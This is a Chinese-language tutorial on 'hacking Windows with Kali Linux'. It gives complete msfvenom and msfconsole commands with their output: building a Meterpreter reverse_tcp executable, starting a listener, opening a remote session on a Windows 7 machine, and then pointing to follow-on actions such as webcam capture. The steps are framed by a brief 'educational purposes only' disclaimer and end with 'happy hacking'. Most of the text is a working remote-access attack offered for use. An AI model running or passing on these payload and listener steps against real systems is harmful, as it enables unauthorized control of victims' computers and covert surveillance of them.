閱讀662 返回首頁    go 人物


如何使用 Kali Linux 黑掉 Windows

Kali Linux 派生自 Debian Linux,主要用於滲透測試,擁有超過 300 個的預安裝好的滲透測試工具。Metasploit 項目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一個用於開發和執行安全利用代碼security exploit的工具。讓我們來使用 Kali Linux 來攻破 Windows 吧。請注意,我寫這篇文章隻是出於教育目的哦——一切因此帶來的後果和本文作者、譯者無關。

源機器詳情

Kali Linux


  1. root@kali:/# uname -a
  2. Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
  3. root@kali:/#

用做攻擊對象的目標機器:


  1. Windows 7 Ultimate SP1

步驟 1:創建 Payload 程序

Payload 是一個類似於病毒或者木馬的程序,可以運行在遠程目標上 —— 為了黑掉那台機器。可以通過以下命令來創建 Payload(program.exe),以便能使用 Kali Linux 黑掉 Windows。


  1. root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe
  2. No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  3. No Arch selected, selecting Arch: x86 from the payload
  4. No encoder or badchars specified, outputting raw payload
  5. Payload size: 333 bytes
  6. Final size of exe file: 73802 bytes
  7. Saved as: /root/program.exe
  8. root@kali:/# ls -la /root/program.exe
  9. -rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe

通過 ls 命令,我們可以確認 Payload 程序是否成功生成在指定的位置。

步驟 2:運行 mfsconsole 命令啟動 msf 命令窗口


  1. root@kali:# msfconsole
  2. .,,. .
  3. .\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
  4. d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
  5. d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
  6. d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
  7. 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
  8. d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
  9. d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
  10. .a#$$$$$$"` 88b d8P 88b`?8888P'
  11. ,s$$$$$$$"` 888888P' 88n _.,,,ass;:
  12. .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
  13. .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
  14. ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
  15. .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
  16. _______________________________________________________________ ,&$$$$$$'_____
  17. ll&&$$$$'
  18. .;;lll&&&&'
  19. ...;;lllll&'
  20. ......;;;llll;;;....
  21. ` ......;;;;... . .
  22. Taking notes in notepad? Have Metasploit Pro track & report
  23. your progress and findings -- learn more on https://rapid7.com/metasploit
  24. =[ metasploit v4.12.22-dev ]
  25. + -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
  26. + -- --=[ 455 payloads - 39 encoders - 8 nops ]
  27. + -- --=[ Free Metasploit Pro trial: https://r-7.co/trymsp ]
  28. msf >

步驟 3:進行漏洞利用的細節

  • 4444 端口:你可以按照自己的想法來選擇使用哪個端口
  • LHOST IP:表示 Kali Linux 機器的 IP,這裏是 192.168.189.128。 使用如下命令來查看你的 Kali Linux 機器的 IP。

  1. root@kali:/# ip r l
  2. 192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100
  3. root@kali:/#

現在在 msf 命令窗口使用 use exploit/multi/handler 命令,如下:


  1. msf > use exploit/multi/handler
  2. msf exploit(handler) >

然後在接下來的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp


  1. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  2. payload => windows/meterpreter/reverse_tcp

現在使用 LHOST 和 LPORT 來設置本地 IP 和本地端口,如下:


  1. msf exploit(handler) > set lhost 192.168.189.128
  2. lhost => 192.168.189.128
  3. msf exploit(handler) > set lport 4444
  4. lport => 4444

最後使用 exploit 命令。


  1. msf exploit(handler) > exploit
  2. [*] Started reverse TCP handler on 192.168.189.128:4444
  3. [*] Starting the payload handler...

現在你需要在 Windows 上運行 program.exe,一旦它在目標機器上執行,你就可以建立一個 meterpreter 會話。輸入 sysinfo 就可以得到這台被黑掉的 Windows 機器的詳情。


  1. msf exploit(handler) > exploit
  2. [*] Started reverse TCP handler on 192.168.189.128:4444
  3. [*] Starting the payload handler...
  4. [*] Sending stage (957999 bytes) to 192.168.189.1
  5. [*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000
  6. meterpreter > sysinfo
  7. Computer : MANN-PC
  8. OS : Windows 7 (Build 7601, Service Pack 1).
  9. Architecture : x64 (Current Process is WOW64)
  10. System Language : en_IN
  11. Domain : WORKGROUP
  12. Logged On Users : 2
  13. Meterpreter : x86/win32

一旦你得到了這些詳細信息,就可以做更多的漏洞利用,或者通過 help 命令獲取更多信息,以便列出你可以黑掉該係統的所有選項,比如 webcam_snap 命令獲取網絡攝像頭,同樣你還可以使用其他更多的可用選項。祝你入侵愉快!!!! ←_←


原文發布時間為:2017-02-11

本文來自雲棲社區合作夥伴“Linux中國”

最後更新:2017-05-26 09:02:08

  上一篇:go  為什麼新年下的決心總是實現不了
  下一篇:go  編寫 android 測試單元該做的和不該做的事